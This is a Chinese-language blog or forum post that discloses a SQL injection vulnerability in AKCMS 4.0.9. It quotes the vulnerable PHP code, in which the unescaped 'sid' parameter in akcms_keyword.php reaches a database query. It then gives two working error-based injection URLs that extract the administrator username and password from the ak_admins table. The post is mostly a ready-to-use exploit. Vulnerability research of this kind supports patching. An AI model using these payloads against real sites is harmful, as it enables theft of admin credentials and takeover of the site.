ak cms 4.0.9 sql注入漏洞 exp

AKCMS是国内最著名的轻量级CMS建站程序,在主流PHP建站系统中特色鲜明,以灵活、小巧、兼容性好、负载强等优点而深受许多站长的喜爱。

我也是无意中发现的不知道有没有人发过呢 漏洞出现在:akcms_keyword.php

<?php $i = strpos(__FILE__, 'akcms_keyword.php');
$mypath= substr(__FILE__, 0, $i);
include $mypath.'akcms_config.php';
include $mypath.$system_root.'/fore/keyword.php';
?>
system_root是和后台目录对应的<?php $system_root = 'admin';
$foreload= 1;
?>

在看看admin/fore/keyword.php

<?php if(!isset($_GET['sid']) ||!isset($_GET['keyword']) ) exit();
require_once $mypath.$system_root.'/include/common.inc.php';
require_once AK_ROOT.'include/forecache.func.php';
$forecache= getforecache($currenturl);
require_once(AK_ROOT.'include/global.func.php');
require_once(AK_ROOT.'include/fore.inc.php');

$sid= $_GET['sid'];
$keyword= $_GET['keyword'];

$se= getsedata($sid);
$k= $db->get_by('*', 'keywords', "sid='$sid' AND keyword='".addslashes($keyword)."'");
if(!isset($template)) $template = $se['template'];

$variables= array();
$variables['template'] = $template;
$variables['html'] = 0;
$variables['sid'] = $sid;
$variables['num'] = $k['num'];
$variables['keyword'] = $keyword;
$variables['keyword_url'] = urlencode($keyword);
$variables['keyword_html'] = htmlspecialchars($keyword);
$html= render_template($variables);

if($forecache === false) setforecache($currenturl, $html);
if(substr($html, 0, 5) == '<?xml') header('Content-Type:text/xml;charset='.$header_charset);
echo $html;
require_once(AK_ROOT.'include/exit.php');
?>

管理员真的很搞啊 对$keyword进行了魔术转义 却没有对sid=$sid 进行转义这我就有点看不懂了

好吧在看看

$db->get_by函数吧(其实都不用看了就是一个select)

 
function get_by($what, $from, $where = '') {
$table= $this->fulltablename($from);
$sql= "SELECT {$what} FROM {$table}";
if($where != '') $sql .= " WHERE {$where}";
if(strpos($what, '(') === false) $sql .= " LIMIT 1";
$row= $this->get_one($sql);
if($row === false) {
return false;
} elseif(count($row) == 1) {
return current($row);
} else {
return $row;
}
}

在get_by里也没有过滤

因此引发sql注入漏洞

 

exp:

管理员账号

 

http://localhost/akcms4.0.9/akcms_keyword.php?sid=11111'and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,editor,0x27,0x7e) from ak_admins limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
and '1'='1&keyword=11

 

管理员密码

http://localhost/akcms4.0.9/akcms_keyword.php?sid=11111'and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,password,0x27,0x7e) from ak_admins limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
and '1'='1&keyword=11

发表评论